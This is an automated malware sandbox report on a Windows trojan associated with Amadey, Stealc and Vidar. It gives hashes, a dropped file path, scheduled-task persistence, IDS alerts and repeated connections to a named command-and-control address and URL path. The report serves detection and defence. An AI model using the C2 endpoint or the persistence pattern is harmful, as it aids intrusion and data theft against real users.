                  IPDomainCountryFlagASNASN NameMalicious
                  77.91.77.82
                  		unknownRussian Federation
                  		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483218
                  Start date and time:2024-07-26 21:07:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 1s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:Jl5yg1Km2s.exe
                  renamed because original name is a hash value
                  Original Sample Name:724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target Jl5yg1Km2s.exe, PID 6896 because it is empty
                  • Execution Graph export aborted for target explorti.exe, PID 736 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Jl5yg1Km2s.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:08:10API Interceptor15331343x Sleep call for process: explorti.exe modified
                  20:08:05Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  77.91.77.82file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php
                  B2lQl9Iy3w.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82/Hun4Ko/index.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousVidarBrowse
                  • 77.91.101.71
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 77.91.101.71
                  file.exeGet hashmaliciousVidarBrowse
                  • 77.91.101.71
                  Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                  • 77.91.101.71
                  Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                  • 77.91.101.71
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82
                  Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 77.91.77.82
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.82
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                  • 77.91.77.82

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                  Download File
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1924608
                  Entropy (8bit):7.946978466746217
                  Encrypted:false
                  SSDEEP:49152:Ol6fovB6nC9NktNC5wmqT+/JIObIKvKWRM6BSZ:Oltn9uC5wEIbKvHm+
                  MD5:1C198A27C76F075B7901945F67ED0115
                  SHA1:335479DD8185471A31C464EC4BF5A3B4C3430C67
                  SHA-256:724F6F07B8D94B11184884DA8FCF987CF43CE7020ADF24240E213B65D2F93B4F
                  SHA-512:E52B9A820A573CB21D8740B8518C58A6502554F380C32B57BB2AB54DDA07725D16036BF85C51ED997E33D359F35B295453E95D8E8BB28C78FFF2B2766C2BAA36
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 79%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@..........................@L...........@.................................X...l...........................`.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cqehubfu.P....1..F..................@...gcjpmbpo......L......8..............@....taggant.0....L.."...<..............@...........................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Windows\Tasks\explorti.job

                  Download File
                  Process:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288
                  Entropy (8bit):3.4411673677304013
                  Encrypted:false
                  SSDEEP:6:81X4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1XAut0:8x4RKQ13vg7jzvYRQV1wut0
                  MD5:26A105B7EE2EFD3003F2F457697620BC
                  SHA1:23782A94240EE775ED040F259732EB535A348E06
                  SHA-256:9ADABF1A78902C505B2C0A34D151A41EE8B6E676E41335220ECAB29670B3BEDC
                  SHA-512:3633E65BF230D95251A88BA1C4FBFA454C33C957C1C32FB98598B7933919A989B782DAD305AC4C310E2FF75F34D13B8F2E566BE3C2F4F36BD13C7B47BC23DE71
                  Malicious:false
                  Reputation:low
                  Preview:.....d{..I.V...m.EF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.946978466746217
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Jl5yg1Km2s.exe
                  File size:1'924'608 bytes
                  MD5:1c198a27c76f075b7901945f67ed0115
                  SHA1:335479dd8185471a31c464ec4bf5a3b4c3430c67
                  SHA256:724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f
                  SHA512:e52b9a820a573cb21d8740b8518c58a6502554f380c32b57bb2ab54dda07725d16036bf85c51ed997e33d359f35b295453e95d8e8bb28c78fff2b2766c2baa36
                  SSDEEP:49152:Ol6fovB6nC9NktNC5wmqT+/JIObIKvKWRM6BSZ:Oltn9uC5wEIbKvHm+
                  TLSH:919533B1A64393EDC95C2EBA765A0CB4F8C146BF015AE8BD0FFA9475D1783AC1B4C241
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0x8c1000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F1CC8B65C8Ah

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4bf4600x10cqehubfu
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4bf4100x18cqehubfu
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x680000x2dc00ddf2132bfa95a4f056d0506e04bc4a7fFalse0.9978921191939891data7.97975540171384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x690000x1e00x20090dcbe8e9568915d91c8541371ca965eFalse0.580078125data4.497195900272457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x6b0000x2b00000x2007886fa96f588048ecb3d4a815746961funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  cqehubfu0x31b0000x1a50000x1a4600394dbeaa7a43366bea5a7751255070cdFalse0.9945843322554268data7.9529251999211485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  gcjpmbpo0x4c00000x10000x400440f52e96c9dcacf1079d1c82a9e783dFalse0.7744140625data6.011612822650518IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4c10000x30000x22007d39624cc62b849850940934a013c364False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x4bf4700x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-26T21:08:18.169836+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973252.165.165.26192.168.2.4
                  2024-07-26T21:09:12.919252+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34975180192.168.2.477.91.77.82
                  2024-07-26T21:08:15.512214+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973080192.168.2.477.91.77.82
                  2024-07-26T21:08:23.668370+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973680192.168.2.477.91.77.82
                  2024-07-26T21:08:31.809183+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34974080192.168.2.477.91.77.82
                  2024-07-26T21:08:56.594028+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974752.165.165.26192.168.2.4

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 26, 2024 21:08:11.478652000 CEST4973080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:11.492326975 CEST804973077.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:11.492614985 CEST4973080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:11.492743015 CEST4973080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:11.500430107 CEST804973077.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:15.512213945 CEST4973080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:15.529289007 CEST4973180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:15.535718918 CEST804973177.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:15.535908937 CEST4973180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:15.536706924 CEST4973180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:15.541517019 CEST804973177.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:19.543535948 CEST4973180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:19.653597116 CEST4973680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:19.658620119 CEST804973677.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:19.658711910 CEST4973680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:19.658808947 CEST4973680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:19.663625002 CEST804973677.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:23.668370008 CEST4973680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:23.673671961 CEST4973980192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:23.678561926 CEST804973977.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:23.678648949 CEST4973980192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:23.678807020 CEST4973980192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:23.683722973 CEST804973977.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:27.684348106 CEST4973980192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:27.795741081 CEST4974080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:27.802217007 CEST804974077.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:27.802319050 CEST4974080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:27.802443027 CEST4974080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:27.810031891 CEST804974077.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:31.809182882 CEST4974080192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:31.811531067 CEST4974180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:31.816622972 CEST804974177.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:31.816736937 CEST4974180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:31.817023039 CEST4974180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:31.823950052 CEST804974177.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:35.825022936 CEST4974180192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:35.936736107 CEST4974280192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:35.943581104 CEST804974277.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:35.943670988 CEST4974280192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:35.943797112 CEST4974280192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:35.949103117 CEST804974277.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:39.950093985 CEST4974280192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:39.951313019 CEST4974380192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:39.956279993 CEST804974377.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:39.956398010 CEST4974380192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:39.956861019 CEST4974380192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:39.963283062 CEST804974377.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:43.949816942 CEST4974380192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:44.062707901 CEST4974480192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:44.067990065 CEST804974477.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:44.068145990 CEST4974480192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:44.068290949 CEST4974480192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:44.075089931 CEST804974477.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:48.074729919 CEST4974480192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:48.078322887 CEST4974580192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:48.083391905 CEST804974577.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:48.083494902 CEST4974580192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:48.083638906 CEST4974580192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:48.088660002 CEST804974577.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:52.090310097 CEST4974580192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:52.200685024 CEST4974680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:52.205724001 CEST804974677.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:52.205868959 CEST4974680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:52.206054926 CEST4974680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:52.210882902 CEST804974677.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:56.215519905 CEST4974680192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:56.219132900 CEST4974880192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:56.225125074 CEST804974877.91.77.82192.168.2.4
                  Jul 26, 2024 21:08:56.225225925 CEST4974880192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:56.225498915 CEST4974880192.168.2.477.91.77.82
                  Jul 26, 2024 21:08:56.251682997 CEST804974877.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:00.230881929 CEST4974880192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:00.342844963 CEST4974980192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:00.525928974 CEST804974977.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:00.526133060 CEST4974980192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:00.526297092 CEST4974980192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:00.538100958 CEST804974977.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:04.512298107 CEST4974980192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:04.514873981 CEST4975080192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:04.519711971 CEST804975077.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:04.519815922 CEST4975080192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:04.519944906 CEST4975080192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:04.525063038 CEST804975077.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:08.528014898 CEST4975080192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:08.690468073 CEST4975180192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:08.906594992 CEST804975177.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:08.906681061 CEST4975180192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:08.909030914 CEST4975180192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:08.913928032 CEST804975177.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:12.919251919 CEST4975180192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:12.922425985 CEST4975280192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:12.927387953 CEST804975277.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:12.927470922 CEST4975280192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:12.927653074 CEST4975280192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:12.932454109 CEST804975277.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:16.934113026 CEST4975280192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:17.045823097 CEST4975380192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:17.122680902 CEST804975377.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:17.122834921 CEST4975380192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:17.122951984 CEST4975380192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:17.135757923 CEST804975377.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:38.577238083 CEST804975377.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:38.577301025 CEST4975380192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:38.577399015 CEST4975380192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:38.580276966 CEST4975480192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:38.584372997 CEST804975377.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:38.586139917 CEST804975477.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:38.586407900 CEST4975480192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:38.586484909 CEST4975480192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:38.591361046 CEST804975477.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:59.951208115 CEST804975477.91.77.82192.168.2.4
                  Jul 26, 2024 21:09:59.951361895 CEST4975480192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:59.951361895 CEST4975480192.168.2.477.91.77.82
                  Jul 26, 2024 21:09:59.956183910 CEST804975477.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:00.062468052 CEST4975580192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:00.067677975 CEST804975577.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:00.067749023 CEST4975580192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:00.067935944 CEST4975580192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:00.072995901 CEST804975577.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:16.840940952 CEST4975580192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:16.844504118 CEST4975680192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:16.850233078 CEST804975677.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:16.850768089 CEST4975680192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:16.850768089 CEST4975680192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:16.855720997 CEST804975677.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:20.841017008 CEST4975680192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:20.953546047 CEST4975780192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:21.375322104 CEST804975777.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:21.376610041 CEST4975780192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:21.380522013 CEST4975780192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:21.385951996 CEST804975777.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:22.466731071 CEST4975780192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:22.470834970 CEST4975880192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:22.475655079 CEST804975877.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:22.475720882 CEST4975880192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:22.475981951 CEST4975880192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:22.480773926 CEST804975877.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:26.481122971 CEST4975880192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:26.593727112 CEST4975980192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:26.600378036 CEST804975977.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:26.600449085 CEST4975980192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:26.600574017 CEST4975980192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:26.606982946 CEST804975977.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:47.952296019 CEST804975977.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:47.952374935 CEST4975980192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:47.956036091 CEST4975980192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:47.960211992 CEST4976080192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:47.960901976 CEST804975977.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:47.965070963 CEST804976077.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:47.965126991 CEST4976080192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:47.965507030 CEST4976080192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:47.970436096 CEST804976077.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:55.778023005 CEST4976080192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:55.894336939 CEST4976180192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:55.899384022 CEST804976177.91.77.82192.168.2.4
                  Jul 26, 2024 21:10:55.899452925 CEST4976180192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:55.899800062 CEST4976180192.168.2.477.91.77.82
                  Jul 26, 2024 21:10:55.904723883 CEST804976177.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:17.283724070 CEST804976177.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:17.283790112 CEST4976180192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:17.283919096 CEST4976180192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:17.287224054 CEST4976280192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:17.291069031 CEST804976177.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:17.295547962 CEST804976277.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:17.295644999 CEST4976280192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:17.295763016 CEST4976280192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:17.301085949 CEST804976277.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:38.705030918 CEST804976277.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:38.705826998 CEST4976280192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:38.705827951 CEST4976280192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:38.712750912 CEST804976277.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:38.814749002 CEST4976380192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:38.823225975 CEST804976377.91.77.82192.168.2.4
